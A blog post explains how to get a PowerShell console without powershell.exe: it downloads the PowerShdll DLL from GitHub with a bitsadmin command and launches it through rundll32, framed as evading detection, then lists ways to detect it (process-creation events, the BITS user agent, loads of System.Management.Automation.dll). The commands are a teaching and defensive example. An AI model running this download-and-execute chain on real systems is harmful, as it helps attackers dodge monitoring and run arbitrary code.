i Utilize PowerShell without executing the powershell.exe binary – All things in moderation

Utilize PowerShell without executing the powershell.exe binary

In recent times, I have learned about techniques in developing modern malware. One of those techniques was to utilize PowerShell without executing the powershell.exe binary. After finding out, I decided to try with PowerShdll.

1. PowerShdll:

This DLL was created by p3nt4 and allows you to execute PowerShell Scripts, commands, encoded commands, and even an interactive shell. Ok, so I could download this on a box and execute it, and boom, now I have PowerShell without PowerShell. I began to think, why not take it a step further. If you’re thinking about it from an adversary’s perspective, and for this particular scenario, we want to execute some PowerShell scripts or commands without triggering any detections.

By taking it a step further, I wanted to start with the classic command prompt. Now I could have immediately gone with another toolset, but I like using Living Off the Land Techniques (This technique has been mentioned in a previous article) . With access to the command prompt, I need to figure out a way to get the PowerShdll onto the system. Fortunately, Microsoft Windows includes plenty of binaries that incorporate some form of download functionality.

bitsadmin /transfer test /priority high https://github.com/p3nt4/PowerShdll/blob/master/dll/bin/x64/Release/PowerShdll.dll?raw=true C:\Users\User\Downloads\test.dll

The command above specifies that we want to use bitsadmin, with a job title of “test” to download the PowerShdll.dll from the Github repository and create a file called test.dll on the local system.

Now that we have the target dll downloaded, we need a way to invoke it.

Enter: rundll32.exe

Rundll32 has the ability to load and run 32-bit DLLs. Based on the available options for PowerShdll, we want to start an interactive console. According to the options listed on the PowerShdll repo, we can utilize -w (interactive console in new window) or -i (interactive console within the current console).

Here is the command that we’re going to use:

Rundll32 test.dll,main -w

The “main” portion of the command specifies the entry point that we’ll be using within the DLL.

After the command executes successfully, a new window opens up with an interactive PowerShell console…without invoking the actual PowerShell.exe binary.

When viewing the process tree in Process Hacker, this is what you’ll see:

We’ve achieved our objectives of using a LoLBin for download capability and another for executing PowerShell without the PowerShell binary.

Now to turn the table around and look at it from a defensive perspective.

2. How to detect this:

In order to detect this at the earliest part of the execution chain, we should start with the BITSAdmin process. Examples:

• Event ID 4688 (A New Process Has Been Created)…this assumes that your host logs are being forwarded to some sort of security monitoring system.
• If you employ a network monitoring capability, you should notice a BITS user agent string.

If you’re attempting to detect the use of PowerShell without the PowerShell binary:

• One method would be to look for the invocation of the System.Management.Automation.dll.
• If you’re looking at the host locally, you can view the threads and dlls invoked by rundll32, or any other process.

Example:

In this example, I’ve searched for the System.Management.Automation.dll

For comparison, here’s what it will look like once the process has exited:

Conclusion:

So, after experimenting with PowerShell without PowerShell, we can see that it’s pretty effective. Another thing to note is that if you’re not properly monitoring LoLBins for malicious activity, you could be missing quite a bit. While these types of techniques are widely used, there are ways to detect and possibly restrict the use of LoLBins.